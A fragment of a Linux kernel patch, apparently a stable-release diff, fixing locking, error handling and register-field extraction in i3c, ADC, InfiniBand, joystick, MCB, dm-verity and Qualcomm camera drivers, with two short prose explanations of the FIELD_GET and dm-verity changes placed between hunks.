++		if (ret)
++			return ret;
++	}
+ 	dat_idx = find_first_zero_bit(hci->DAT_data, hci->DAT_entries);
+ 	if (dat_idx >= hci->DAT_entries)
+ 		return -ENOENT;
+@@ -103,7 +111,8 @@ static void hci_dat_v1_free_entry(struct i3c_hci *hci, unsigned int dat_idx)
+ {
+ 	dat_w0_write(dat_idx, 0);
+ 	dat_w1_write(dat_idx, 0);
+-	__clear_bit(dat_idx, hci->DAT_data);
++	if (hci->DAT_data)
++		__clear_bit(dat_idx, hci->DAT_data);
+ }
+ 
+ static void hci_dat_v1_set_dynamic_addr(struct i3c_hci *hci,
+diff --git a/drivers/i3c/master/mipi-i3c-hci/dma.c b/drivers/i3c/master/mipi-i3c-hci/dma.c
+index 2990ac9eaade7..71b5dbe45c45c 100644
+--- a/drivers/i3c/master/mipi-i3c-hci/dma.c
++++ b/drivers/i3c/master/mipi-i3c-hci/dma.c
+@@ -734,7 +734,7 @@ static bool hci_dma_irq_handler(struct i3c_hci *hci, unsigned int mask)
+ 	unsigned int i;
+ 	bool handled = false;
+ 
+-	for (i = 0; mask && i < 8; i++) {
++	for (i = 0; mask && i < rings->total; i++) {
+ 		struct hci_rh_data *rh;
+ 		u32 status;
+ 
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index 4eebf15f685a3..f30d457e91196 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -92,6 +92,8 @@
+ #define SVC_I3C_MINTCLR      0x094
+ #define SVC_I3C_MINTMASKED   0x098
+ #define SVC_I3C_MERRWARN     0x09C
++#define   SVC_I3C_MERRWARN_NACK BIT(2)
++#define   SVC_I3C_MERRWARN_TIMEOUT BIT(20)
+ #define SVC_I3C_MDMACTRL     0x0A0
+ #define SVC_I3C_MDATACTRL    0x0AC
+ #define   SVC_I3C_MDATACTRL_FLUSHTB BIT(0)
+@@ -168,6 +170,7 @@ struct svc_i3c_xfer {
+  * @ibi.slots: Available IBI slots
+  * @ibi.tbq_slot: To be queued IBI slot
+  * @ibi.lock: IBI lock
++ * @lock: Transfer lock, protect between IBI work thread and callbacks from master
+  */
+ struct svc_i3c_master {
+ 	struct i3c_master_controller base;
+@@ -195,6 +198,7 @@ struct svc_i3c_master {
+ 		/* Prevent races within IBI handlers */
+ 		spinlock_t lock;
+ 	} ibi;
++	struct mutex lock;
+ };
+ 
+ /**
+@@ -217,6 +221,14 @@ static bool svc_i3c_master_error(struct svc_i3c_master *master)
+ 	if (SVC_I3C_MSTATUS_ERRWARN(mstatus)) {
+ 		merrwarn = readl(master->regs + SVC_I3C_MERRWARN);
+ 		writel(merrwarn, master->regs + SVC_I3C_MERRWARN);
++
++		/* Ignore timeout error */
++		if (merrwarn & SVC_I3C_MERRWARN_TIMEOUT) {
++			dev_dbg(master->dev, "Warning condition: MSTATUS 0x%08x, MERRWARN 0x%08x\n",
++				mstatus, merrwarn);
++			return false;
++		}
++
+ 		dev_err(master->dev,
+ 			"Error condition: MSTATUS 0x%08x, MERRWARN 0x%08x\n",
+ 			mstatus, merrwarn);
+@@ -323,6 +335,7 @@ static int svc_i3c_master_handle_ibi(struct svc_i3c_master *master,
+ 	struct i3c_ibi_slot *slot;
+ 	unsigned int count;
+ 	u32 mdatactrl;
++	int ret, val;
+ 	u8 *buf;
+ 
+ 	slot = i3c_generic_ibi_get_free_slot(data->ibi_pool);
+@@ -332,6 +345,13 @@ static int svc_i3c_master_handle_ibi(struct svc_i3c_master *master,
+ 	slot->len = 0;
+ 	buf = slot->data;
+ 
++	ret = readl_relaxed_poll_timeout(master->regs + SVC_I3C_MSTATUS, val,
++						SVC_I3C_MSTATUS_COMPLETE(val), 0, 1000);
++	if (ret) {
++		dev_err(master->dev, "Timeout when polling for COMPLETE\n");
++		return ret;
++	}
++
+ 	while (SVC_I3C_MSTATUS_RXPEND(readl(master->regs + SVC_I3C_MSTATUS))  &&
+ 	       slot->len < SVC_I3C_FIFO_SIZE) {
+ 		mdatactrl = readl(master->regs + SVC_I3C_MDATACTRL);
+@@ -376,6 +396,7 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 	u32 status, val;
+ 	int ret;
+ 
++	mutex_lock(&master->lock);
+ 	/* Acknowledge the incoming interrupt with the AUTOIBI mechanism */
+ 	writel(SVC_I3C_MCTRL_REQUEST_AUTO_IBI |
+ 	       SVC_I3C_MCTRL_IBIRESP_AUTO,
+@@ -386,6 +407,7 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 					 SVC_I3C_MSTATUS_IBIWON(val), 0, 1000);
+ 	if (ret) {
+ 		dev_err(master->dev, "Timeout when polling for IBIWON\n");
++		svc_i3c_master_emit_stop(master);
+ 		goto reenable_ibis;
+ 	}
+ 
+@@ -452,12 +474,13 @@ static void svc_i3c_master_ibi_work(struct work_struct *work)
+ 
+ reenable_ibis:
+ 	svc_i3c_master_enable_interrupts(master, SVC_I3C_MINT_SLVSTART);
++	mutex_unlock(&master->lock);
+ }
+ 
+ static irqreturn_t svc_i3c_master_irq_handler(int irq, void *dev_id)
+ {
+ 	struct svc_i3c_master *master = (struct svc_i3c_master *)dev_id;
+-	u32 active = readl(master->regs + SVC_I3C_MINTMASKED);
++	u32 active = readl(master->regs + SVC_I3C_MSTATUS);
+ 
+ 	if (!SVC_I3C_MSTATUS_SLVSTART(active))
+ 		return IRQ_NONE;
+@@ -999,6 +1022,9 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	u32 reg;
+ 	int ret;
+ 
++	/* clean SVC_I3C_MINT_IBIWON w1c bits */
++	writel(SVC_I3C_MINT_IBIWON, master->regs + SVC_I3C_MSTATUS);
++
+ 	writel(SVC_I3C_MCTRL_REQUEST_START_ADDR |
+ 	       xfer_type |
+ 	       SVC_I3C_MCTRL_IBIRESP_NACK |
+@@ -1012,6 +1038,11 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	if (ret)
+ 		goto emit_stop;
+ 
++	if (readl(master->regs + SVC_I3C_MERRWARN) & SVC_I3C_MERRWARN_NACK) {
++		ret = -ENXIO;
++		goto emit_stop;
++	}
++
+ 	if (rnw)
+ 		ret = svc_i3c_master_read(master, in, xfer_len);
+ 	else
+@@ -1019,6 +1050,23 @@ static int svc_i3c_master_xfer(struct svc_i3c_master *master,
+ 	if (ret < 0)
+ 		goto emit_stop;
+ 
++	/*
++	 * According to I3C spec ver 1.1.1, 5.1.2.2.3 Consequence of Controller Starting a Frame
++	 * with I3C Target Address.
++	 *
++	 * The I3C Controller normally should start a Frame, the Address may be arbitrated, and so
++	 * the Controller shall monitor to see whether an In-Band Interrupt request, a Controller
++	 * Role Request (i.e., Secondary Controller requests to become the Active Controller), or
++	 * a Hot-Join Request has been made.
++	 *
++	 * If missed IBIWON check, the wrong data will be return. When IBIWON happen, return failure
++	 * and yield the above events handler.
++	 */
++	if (SVC_I3C_MSTATUS_IBIWON(reg)) {
++		ret = -ENXIO;
++		goto emit_stop;
++	}
++
+ 	if (rnw)
+ 		*read_len = ret;
+ 
+@@ -1191,9 +1239,11 @@ static int svc_i3c_master_send_bdcast_ccc_cmd(struct svc_i3c_master *master,
+ 	cmd->read_len = 0;
+ 	cmd->continued = false;
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	kfree(buf);
+@@ -1237,9 +1287,11 @@ static int svc_i3c_master_send_direct_ccc_cmd(struct svc_i3c_master *master,
+ 	cmd->read_len = read_len;
+ 	cmd->continued = false;
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	if (cmd->read_len != xfer_len)
+ 		ccc->dests[0].payload.len = cmd->read_len;
+@@ -1296,9 +1348,11 @@ static int svc_i3c_master_priv_xfers(struct i3c_dev_desc *dev,
+ 		cmd->continued = (i + 1) < nxfers;
+ 	}
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	svc_i3c_master_free_xfer(xfer);
+@@ -1334,9 +1388,11 @@ static int svc_i3c_master_i2c_xfers(struct i2c_dev_desc *dev,
+ 		cmd->continued = (i + 1 < nxfers);
+ 	}
+ 
++	mutex_lock(&master->lock);
+ 	svc_i3c_master_enqueue_xfer(master, xfer);
+ 	if (!wait_for_completion_timeout(&xfer->comp, msecs_to_jiffies(1000)))
+ 		svc_i3c_master_dequeue_xfer(master, xfer);
++	mutex_unlock(&master->lock);
+ 
+ 	ret = xfer->ret;
+ 	svc_i3c_master_free_xfer(xfer);
+@@ -1527,6 +1583,8 @@ static int svc_i3c_master_probe(struct platform_device *pdev)
+ 
+ 	INIT_WORK(&master->hj_work, svc_i3c_master_hj_work);
+ 	INIT_WORK(&master->ibi_work, svc_i3c_master_ibi_work);
++	mutex_init(&master->lock);
++
+ 	ret = devm_request_irq(dev, master->irq, svc_i3c_master_irq_handler,
+ 			       IRQF_NO_SUSPEND, "svc-i3c-irq", master);
+ 	if (ret)
+diff --git a/drivers/iio/adc/stm32-adc-core.c b/drivers/iio/adc/stm32-adc-core.c
+index 81d5db91c67bf..dee47b899e5df 100644
+--- a/drivers/iio/adc/stm32-adc-core.c
++++ b/drivers/iio/adc/stm32-adc-core.c
+@@ -695,6 +695,8 @@ static int stm32_adc_probe(struct platform_device *pdev)
+ 	struct stm32_adc_priv *priv;
+ 	struct device *dev = &pdev->dev;
+ 	struct device_node *np = pdev->dev.of_node;
++	const struct of_device_id *of_id;
++
+ 	struct resource *res;
+ 	u32 max_rate;
+ 	int ret;
+@@ -707,8 +709,11 @@ static int stm32_adc_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 	platform_set_drvdata(pdev, &priv->common);
+ 
+-	priv->cfg = (const struct stm32_adc_priv_cfg *)
+-		of_match_device(dev->driver->of_match_table, dev)->data;
++	of_id = of_match_device(dev->driver->of_match_table, dev);
++	if (!of_id)
++		return -ENODEV;
++
++	priv->cfg = (const struct stm32_adc_priv_cfg *)of_id->data;
+ 	priv->nb_adc_max = priv->cfg->num_adcs;
+ 	spin_lock_init(&priv->common.lock);
+ 
+diff --git a/drivers/infiniband/hw/hfi1/pcie.c b/drivers/infiniband/hw/hfi1/pcie.c
+index a0802332c8cb3..5395cf56fbd90 100644
+--- a/drivers/infiniband/hw/hfi1/pcie.c
++++ b/drivers/infiniband/hw/hfi1/pcie.c
+@@ -3,6 +3,7 @@
+  * Copyright(c) 2015 - 2019 Intel Corporation.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/pci.h>
+ #include <linux/io.h>
+ #include <linux/delay.h>
+@@ -212,12 +213,6 @@ static u32 extract_speed(u16 linkstat)
+ 	return speed;
+ }
+ 
+-/* return the PCIe link speed from the given link status */
+-static u32 extract_width(u16 linkstat)
+-{
+-	return (linkstat & PCI_EXP_LNKSTA_NLW) >> PCI_EXP_LNKSTA_NLW_SHIFT;
+-}
+-
+ /* read the link status and set dd->{lbus_width,lbus_speed,lbus_info} */
+ static void update_lbus_info(struct hfi1_devdata *dd)
+ {
+@@ -230,7 +225,7 @@ static void update_lbus_info(struct hfi1_devdata *dd)
+ 		return;
+ 	}
+ 
+-	dd->lbus_width = extract_width(linkstat);
++	dd->lbus_width = FIELD_GET(PCI_EXP_LNKSTA_NLW, linkstat);
+ 	dd->lbus_speed = extract_speed(linkstat);
+ 	snprintf(dd->lbus_info, sizeof(dd->lbus_info),
+ 		 "PCIe,%uMHz,x%u", dd->lbus_speed, dd->lbus_width);
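FIELD_GET() from linux/bitfield.h derives the shift from the mask constant at compile time, so the open-coded pair "(linkstat & PCI_EXP_LNKSTA_NLW) >> PCI_EXP_LNKSTA_NLW_SHIFT" can no longer drift out of sync; the cobalt hunks below make the same conversion. The shape of the call:

    #include <linux/bitfield.h>

    /* Extracts the negotiated-link-width field (bits 9:4 of Link Status);
     * the shift count comes from the mask itself. */
    u32 width = FIELD_GET(PCI_EXP_LNKSTA_NLW, linkstat);
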
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index c19a4d2023805..fc6957fddce8e 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -474,6 +474,7 @@ static const struct usb_device_id xpad_table[] = {
+ 	XPAD_XBOX360_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOXONE_VENDOR(0x0f0d),		/* Hori Controllers */
+ 	XPAD_XBOX360_VENDOR(0x1038),		/* SteelSeries Controllers */
++	XPAD_XBOXONE_VENDOR(0x10f5),		/* Turtle Beach Controllers */
+ 	XPAD_XBOX360_VENDOR(0x11c9),		/* Nacon GC100XF */
+ 	XPAD_XBOX360_VENDOR(0x11ff),		/* PXN V900 */
+ 	XPAD_XBOX360_VENDOR(0x1209),		/* Ardwiino Controllers */
+diff --git a/drivers/mcb/mcb-core.c b/drivers/mcb/mcb-core.c
+index e7b6989d8b4a8..a6b4ccc314cac 100644
+--- a/drivers/mcb/mcb-core.c
++++ b/drivers/mcb/mcb-core.c
+@@ -246,6 +246,7 @@ int mcb_device_register(struct mcb_bus *bus, struct mcb_device *dev)
+ 	return 0;
+ 
+ out:
++	put_device(&dev->dev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/mcb/mcb-parse.c b/drivers/mcb/mcb-parse.c
+index 656b6b71c7682..1ae37e693de04 100644
+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -106,7 +106,7 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	return 0;
+ 
+ err:
+-	put_device(&mdev->dev);
++	mcb_free_dev(mdev);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/md/dm-verity-fec.c b/drivers/md/dm-verity-fec.c
+index 962fc32c947c5..9eb03bb224698 100644
+--- a/drivers/md/dm-verity-fec.c
++++ b/drivers/md/dm-verity-fec.c
+@@ -185,7 +185,7 @@ static int fec_is_erasure(struct dm_verity *v, struct dm_verity_io *io,
+ {
+ 	if (unlikely(verity_hash(v, verity_io_hash_req(v, io),
+ 				 data, 1 << v->data_dev_block_bits,
+-				 verity_io_real_digest(v, io))))
++				 verity_io_real_digest(v, io), true)))
+ 		return 0;
+ 
+ 	return memcmp(verity_io_real_digest(v, io), want_digest,
+@@ -386,7 +386,7 @@ static int fec_decode_rsb(struct dm_verity *v, struct dm_verity_io *io,
+ 	/* Always re-validate the corrected block against the expected hash */
+ 	r = verity_hash(v, verity_io_hash_req(v, io), fio->output,
+ 			1 << v->data_dev_block_bits,
+-			verity_io_real_digest(v, io));
++			verity_io_real_digest(v, io), true);
+ 	if (unlikely(r < 0))
+ 		return r;
+ 
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 14a9988ec30ba..b86d41219ba9c 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -132,20 +132,21 @@ static int verity_hash_update(struct dm_verity *v, struct ahash_request *req,
+  * Wrapper for crypto_ahash_init, which handles verity salting.
+  */
+ static int verity_hash_init(struct dm_verity *v, struct ahash_request *req,
+-				struct crypto_wait *wait)
++				struct crypto_wait *wait, bool may_sleep)
+ {
+ 	int r;
+ 
+ 	ahash_request_set_tfm(req, v->tfm);
+-	ahash_request_set_callback(req, CRYPTO_TFM_REQ_MAY_SLEEP |
+-					CRYPTO_TFM_REQ_MAY_BACKLOG,
+-					crypto_req_done, (void *)wait);
++	ahash_request_set_callback(req,
++		may_sleep ? CRYPTO_TFM_REQ_MAY_SLEEP | CRYPTO_TFM_REQ_MAY_BACKLOG : 0,
++		crypto_req_done, (void *)wait);
+ 	crypto_init_wait(wait);
+ 
+ 	r = crypto_wait_req(crypto_ahash_init(req), wait);
+ 
+ 	if (unlikely(r < 0)) {
+-		DMERR("crypto_ahash_init failed: %d", r);
++		if (r != -ENOMEM)
++			DMERR("crypto_ahash_init failed: %d", r);
+ 		return r;
+ 	}
+ 
+@@ -176,12 +177,12 @@ out:
+ }
+ 
+ int verity_hash(struct dm_verity *v, struct ahash_request *req,
+-		const u8 *data, size_t len, u8 *digest)
++		const u8 *data, size_t len, u8 *digest, bool may_sleep)
+ {
+ 	int r;
+ 	struct crypto_wait wait;
+ 
+-	r = verity_hash_init(v, req, &wait);
++	r = verity_hash_init(v, req, &wait, may_sleep);
+ 	if (unlikely(r < 0))
+ 		goto out;
+ 
+@@ -317,7 +318,7 @@ static int verity_verify_level(struct dm_verity *v, struct dm_verity_io *io,
+ 
+ 		r = verity_hash(v, verity_io_hash_req(v, io),
+ 				data, 1 << v->hash_dev_block_bits,
+-				verity_io_real_digest(v, io));
++				verity_io_real_digest(v, io), !io->in_tasklet);
+ 		if (unlikely(r < 0))
+ 			goto release_ret_r;
+ 
+@@ -548,7 +549,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 			continue;
+ 		}
+ 
+-		r = verity_hash_init(v, req, &wait);
++		r = verity_hash_init(v, req, &wait, !io->in_tasklet);
+ 		if (unlikely(r < 0))
+ 			return r;
+ 
+@@ -641,7 +642,7 @@ static void verity_tasklet(unsigned long data)
+ 
+ 	io->in_tasklet = true;
+ 	err = verity_verify_io(io);
+-	if (err == -EAGAIN) {
++	if (err == -EAGAIN || err == -ENOMEM) {
+ 		/* fallback to retrying with work-queue */
+ 		INIT_WORK(&io->work, verity_work);
+ 		queue_work(io->v->verify_wq, &io->work);
+@@ -1018,7 +1019,7 @@ static int verity_alloc_zero_digest(struct dm_verity *v)
+ 		goto out;
+ 
+ 	r = verity_hash(v, req, zero_data, 1 << v->data_dev_block_bits,
+-			v->zero_digest);
++			v->zero_digest, true);
+ 
+ out:
+ 	kfree(req);
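The may_sleep plumbing exists because dm-verity can now hash from tasklet (atomic) context: there the ahash request must not carry CRYPTO_TFM_REQ_MAY_SLEEP or CRYPTO_TFM_REQ_MAY_BACKLOG, and a resulting -ENOMEM is treated like -EAGAIN, bouncing the I/O to the workqueue for a retry in process context. The flag selection in isolation:

    /* Atomic callers (tasklet path) pass may_sleep = false and get flags == 0. */
    u32 flags = may_sleep ? CRYPTO_TFM_REQ_MAY_SLEEP |
                            CRYPTO_TFM_REQ_MAY_BACKLOG : 0;

    ahash_request_set_callback(req, flags, crypto_req_done, &wait);
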
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index 2f555b4203679..f96f4e281ee4a 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -128,7 +128,7 @@ extern int verity_for_bv_block(struct dm_verity *v, struct dm_verity_io *io,
+ 					      u8 *data, size_t len));
+ 
+ extern int verity_hash(struct dm_verity *v, struct ahash_request *req,
+-		       const u8 *data, size_t len, u8 *digest);
++		       const u8 *data, size_t len, u8 *digest, bool may_sleep);
+ 
+ extern int verity_hash_for_block(struct dm_verity *v, struct dm_verity_io *io,
+ 				 sector_t block, u8 *digest, bool *is_zero);
+diff --git a/drivers/media/i2c/ccs/ccs-core.c b/drivers/media/i2c/ccs/ccs-core.c
+index 4a14d7e5d9f25..5fdb922d24e05 100644
+--- a/drivers/media/i2c/ccs/ccs-core.c
++++ b/drivers/media/i2c/ccs/ccs-core.c
+@@ -3088,7 +3088,7 @@ static int ccs_open(struct v4l2_subdev *sd, struct v4l2_subdev_fh *fh)
+ 		try_fmt->code = sensor->internal_csi_format->code;
+ 		try_fmt->field = V4L2_FIELD_NONE;
+ 
+-		if (ssd != sensor->pixel_array)
++		if (ssd == sensor->pixel_array)
+ 			continue;
+ 
+ 		try_comp = v4l2_subdev_get_try_compose(sd, fh->state, i);
+diff --git a/drivers/media/i2c/ccs/ccs-quirk.h b/drivers/media/i2c/ccs/ccs-quirk.h
+index 5838fcda92fd4..0b1a64958d714 100644
+--- a/drivers/media/i2c/ccs/ccs-quirk.h
++++ b/drivers/media/i2c/ccs/ccs-quirk.h
+@@ -32,12 +32,10 @@ struct ccs_sensor;
+  *		@reg: Pointer to the register to access
+  *		@value: Register value, set by the caller on write, or
+  *			by the quirk on read
+- *
+- * @flags: Quirk flags
+- *
+  *		@return: 0 on success, -ENOIOCTLCMD if no register
+  *			 access may be done by the caller (default read
+  *			 value is zero), else negative error code on error
++ * @flags: Quirk flags
+  */
+ struct ccs_quirk {
+ 	int (*limits)(struct ccs_sensor *sensor);
+diff --git a/drivers/media/pci/cobalt/cobalt-driver.c b/drivers/media/pci/cobalt/cobalt-driver.c
+index 74edcc76d12f4..6e1a0614e6d06 100644
+--- a/drivers/media/pci/cobalt/cobalt-driver.c
++++ b/drivers/media/pci/cobalt/cobalt-driver.c
+@@ -8,6 +8,7 @@
+  *  All rights reserved.
+  */
+ 
++#include <linux/bitfield.h>
+ #include <linux/delay.h>
+ #include <media/i2c/adv7604.h>
+ #include <media/i2c/adv7842.h>
+@@ -210,17 +211,17 @@ void cobalt_pcie_status_show(struct cobalt *cobalt)
+ 	pcie_capability_read_word(pci_dev, PCI_EXP_LNKSTA, &stat);
+ 	cobalt_info("PCIe link capability 0x%08x: %s per lane and %u lanes\n",
+ 			capa, get_link_speed(capa),
+-			(capa & PCI_EXP_LNKCAP_MLW) >> 4);
++			FIELD_GET(PCI_EXP_LNKCAP_MLW, capa));
+ 	cobalt_info("PCIe link control 0x%04x\n", ctrl);
+ 	cobalt_info("PCIe link status 0x%04x: %s per lane and %u lanes\n",
+ 		    stat, get_link_speed(stat),
+-		    (stat & PCI_EXP_LNKSTA_NLW) >> 4);
++		    FIELD_GET(PCI_EXP_LNKSTA_NLW, stat));
+ 
+ 	/* Bus */
+ 	pcie_capability_read_dword(pci_bus_dev, PCI_EXP_LNKCAP, &capa);
+ 	cobalt_info("PCIe bus link capability 0x%08x: %s per lane and %u lanes\n",
+ 			capa, get_link_speed(capa),
+-			(capa & PCI_EXP_LNKCAP_MLW) >> 4);
++			FIELD_GET(PCI_EXP_LNKCAP_MLW, capa));
+ 
+ 	/* Slot */
+ 	pcie_capability_read_dword(pci_dev, PCI_EXP_SLTCAP, &capa);
+@@ -239,7 +240,7 @@ static unsigned pcie_link_get_lanes(struct cobalt *cobalt)
+ 	if (!pci_is_pcie(pci_dev))
+ 		return 0;
+ 	pcie_capability_read_word(pci_dev, PCI_EXP_LNKSTA, &link);
+-	return (link & PCI_EXP_LNKSTA_NLW) >> 4;
++	return FIELD_GET(PCI_EXP_LNKSTA_NLW, link);
+ }
+ 
+ static unsigned pcie_bus_link_get_lanes(struct cobalt *cobalt)
+@@ -250,7 +251,7 @@ static unsigned pcie_bus_link_get_lanes(struct cobalt *cobalt)
+ 	if (!pci_is_pcie(pci_dev))
+ 		return 0;
+ 	pcie_capability_read_dword(pci_dev, PCI_EXP_LNKCAP, &link);
+-	return (link & PCI_EXP_LNKCAP_MLW) >> 4;
++	return FIELD_GET(PCI_EXP_LNKCAP_MLW, link);
+ }
+ 
+ static void msi_config_show(struct cobalt *cobalt, struct pci_dev *pci_dev)
+diff --git a/drivers/media/platform/qcom/camss/camss-csid-gen2.c b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+index 2031bde13a939..904208f6f9546 100644
+--- a/drivers/media/platform/qcom/camss/camss-csid-gen2.c
++++ b/drivers/media/platform/qcom/camss/camss-csid-gen2.c
+@@ -355,9 +355,6 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 		u8 dt_id = vc * 4;
+ 
+ 		if (tg->enabled) {
+-			/* Config Test Generator */
+-			vc = 0xa;
+-
+ 			/* configure one DT, infinite frames */
+ 			val = vc << TPG_VC_CFG0_VC_NUM;
+ 			val |= INTELEAVING_MODE_ONE_SHOT << TPG_VC_CFG0_LINE_INTERLEAVING_MODE;
+@@ -370,14 +367,14 @@ static void csid_configure_stream(struct csid_device *csid, u8 enable)
+ 
+ 			writel_relaxed(0x12345678, csid->base + CSID_TPG_LFSR_SEED);
+ 
+-			val = input_format->height & 0x1fff << TPG_DT_n_CFG_0_FRAME_HEIGHT;
+-			val |= input_format->width & 0x1fff << TPG_DT_n_CFG_0_FRAME_WIDTH;
++			val = (input_format->height & 0x1fff) << TPG_DT_n_CFG_0_FRAME_HEIGHT;
++			val |= (input_format->width & 0x1fff) << TPG_DT_n_CFG_0_FRAME_WIDTH;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_0(0));
+ 
+ 			val = format->data_type << TPG_DT_n_CFG_1_DATA_TYPE;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_1(0));
+ 
+-			val = tg->mode << TPG_DT_n_CFG_2_PAYLOAD_MODE;
++			val = (tg->mode - 1) << TPG_DT_n_CFG_2_PAYLOAD_MODE;
+ 			val |= 0xBE << TPG_DT_n_CFG_2_USER_SPECIFIED_PAYLOAD;
+ 			val |= format->decode_format << TPG_DT_n_CFG_2_ENCODE_FORMAT;
+ 			writel_relaxed(val, csid->base + CSID_TPG_DT_n_CFG_2(0));
+diff --git a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+index 04baa80494c66..4dba61b8d3f2a 100644
+--- a/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
++++ b/drivers/media/platform/qcom/camss/camss-csiphy-3ph-1-0.c
+@@ -476,7 +476,7 @@ static void csiphy_lanes_enable(struct csiphy_device *csiphy,
+ 
+ 	settle_cnt = csiphy_settle_cnt_calc(link_freq, csiphy->timer_clk_rate);
+ 
+-	val = is_gen2 ? BIT(7) : CSIPHY_3PH_CMN_CSI_COMMON_CTRL5_CLK_ENABLE;
++	val = CSIPHY_3PH_CMN_CSI_COMMON_CTRL5_CLK_ENABLE;
+ 	for (i = 0; i < c->num_data; i++)
+ 		val |= BIT(c->data[i].pos * 2);
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-170.c b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+index 600150cfc4f70..07b64d257512c 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-170.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+@@ -7,7 +7,6 @@
+  * Copyright (C) 2020-2021 Linaro Ltd.
+  */
+ 
+-#include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -494,35 +493,20 @@ static int vfe_enable_output(struct vfe_line *line)
+ 	return 0;
+ }
+ 
+-static int vfe_disable_output(struct vfe_line *line)
++static void vfe_disable_output(struct vfe_line *line)
+ {
+ 	struct vfe_device *vfe = to_vfe(line);
+ 	struct vfe_output *output = &line->output;
+ 	unsigned long flags;
+ 	unsigned int i;
+-	bool done;
+-	int timeout = 0;
+-
+-	do {
+-		spin_lock_irqsave(&vfe->output_lock, flags);
+-		done = !output->gen2.active_num;
+-		spin_unlock_irqrestore(&vfe->output_lock, flags);
+-		usleep_range(10000, 20000);
+-
+-		if (timeout++ == 100) {
+-			dev_err(vfe->camss->dev, "VFE idle timeout - resetting\n");
+-			vfe_reset(vfe);
+-			output->gen2.active_num = 0;
+-			return 0;
+-		}
+-	} while (!done);
+ 
+ 	spin_lock_irqsave(&vfe->output_lock, flags);
+ 	for (i = 0; i < output->wm_num; i++)
+ 		vfe_wm_stop(vfe, output->wm_idx[i]);
++	output->gen2.active_num = 0;
+ 	spin_unlock_irqrestore(&vfe->output_lock, flags);
+ 
+-	return 0;
++	vfe_reset(vfe);
+ }
+ 
+ /*
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-480.c b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+index 1295851103931..ab42600f7a745 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-480.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+@@ -8,7 +8,6 @@
+  * Copyright (C) 2021 Jonathan Marek
+  */
+ 
+-#include <linux/delay.h>
+ #include <linux/interrupt.h>
+ #include <linux/io.h>
+ #include <linux/iopoll.h>
+@@ -311,35 +310,20 @@ static int vfe_enable_output(struct vfe_line *line)
+ 	return 0;
+ }
+ 
+-static int vfe_disable_output(struct vfe_line *line)
++static void vfe_disable_output(struct vfe_line *line)
+ {
+ 	struct vfe_device *vfe = to_vfe(line);
+ 	struct vfe_output *output = &line->output;
+ 	unsigned long flags;
+ 	unsigned int i;
+-	bool done;
+-	int timeout = 0;
+-
+-	do {
+-		spin_lock_irqsave(&vfe->output_lock, flags);
+-		done = !output->gen2.active_num;
+-		spin_unlock_irqrestore(&vfe->output_lock, flags);
+-		usleep_range(10000, 20000);
+-
+-		if (timeout++ == 100) {
+-			dev_err(vfe->camss->dev, "VFE idle timeout - resetting\n");
+-			vfe_reset(vfe);
+-			output->gen2.active_num = 0;
+-			return 0;
+-		}
+-	} while (!done);
+ 
+ 	spin_lock_irqsave(&vfe->output_lock, flags);
+ 	for (i = 0; i < output->wm_num; i++)
+ 		vfe_wm_stop(vfe, output->wm_idx[i]);
++	output->gen2.active_num = 0;
+ 	spin_unlock_irqrestore(&vfe->output_lock, flags);
+ 
+-	return 0;
++	vfe_reset(vfe);
+ }
+ 
+ /*
